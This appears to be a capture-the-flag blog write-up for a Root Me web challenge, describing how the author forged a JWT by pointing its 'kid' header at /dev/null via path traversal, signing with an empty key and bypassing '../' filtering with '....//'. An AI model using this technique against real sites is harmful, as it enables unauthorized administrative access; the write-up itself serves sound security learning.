281 words
1 minutes
Jwt - Unsecure File Signature
2023-07-13
Web Exploitation
JWT
/
Local File Inclusion
NOTE

Description : A previous Root Me administrator is trying to replicate the website after being banned for sharing challenge solutions. Try to find out if he is hiding any other flags on his new website.

Web-View#

web-view

I’m having difficulty deciphering the location of Buttons on this website.

Upon inspecting the page’s source code, I discovered certain endpoints that seem intriguing.

/admin
static/challs/htmllecture.html
static/challs/irc.html
static/challs/obfu6.html
static/https://www.youtube.com/watch?v=ZYrmrflWBmY
static/challs/samboxv5.html

/admin#

Upon accessing the ‘admin’ endpoint at http://challenge01.root-me.org:59081/admin, I encountered an ‘Unauthorized’ error.

{"Unauthorized":"You are not admin !"}

burp#

I attempted to intercept the request using Burp in order to uncover more information.

Burp-request

It appears that the situation involves JWT (JSON Web Tokens).

To gain a clearer understanding, I searched for information on jwt.io to access helpful visualizations and explanations.

JWT.IO#

jwt-io

While encoding the JWT, I observed that it utilizes the HS256 (HMAC_SHA256) algorithm along with a “kid” (Key ID) parameter.

The “kid” (key ID) claim is a string that signifies the key responsible for digitally signing the JWT.

If you’re interested in delving deeper into attacks involving the “kid” parameter in JWTs, you can find more information here: kid-parameter

Afterwards, I proceeded to modify the JWT by signing it with a particular secret key and conducting attacks on the JWT “kid” header, such as SQL injection and OS injection. Eventually, I identified a path traversal vulnerability in the “kid” header. I attempted to alter the “kid” header to “/dev/null” and sign the JWT with an empty secret key.

empty-sign

path-traversal

However, a complication arose: there seems to be a replace function or a similar mechanism in place that eliminates our ”../” sequences.

Yet, we can overcome this by using the pattern ....//....//....// to bypass the restriction and continue with our intended manipulation.

final_sol

As a result of these efforts, we successfully obtained the flag!

flag

have Fun 💜

COP
Pilgrimage
Achux21 | 𒉭